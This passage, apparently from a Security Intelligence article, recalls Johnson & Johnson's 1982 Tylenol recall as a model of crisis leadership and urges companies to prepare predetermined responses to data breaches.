Think back to the Tylenol scandal of 1982, when criminals tampered with bottles and laced the pain-relieving pills with poison that killed several people. Tylenol’s maker, Johnson & Johnson, immediately removed the product from all store shelves, even though there was no indication of a manufacturing problem. The parent company trusted its brand to survive such a hit, and indeed it did. The company was widely applauded for its leadership in a time of crisis and its near-instant response.

Breaches will continue to happen, possibly even at an accelerated pace, given the growing interconnectivity all around us and the expanding threat surface that comes with it. The worst thing a company can do in response is what so many end up doing — nothing. Instead, be prepared to meet the crisis with predetermined, definitive responses.



Security Intelligence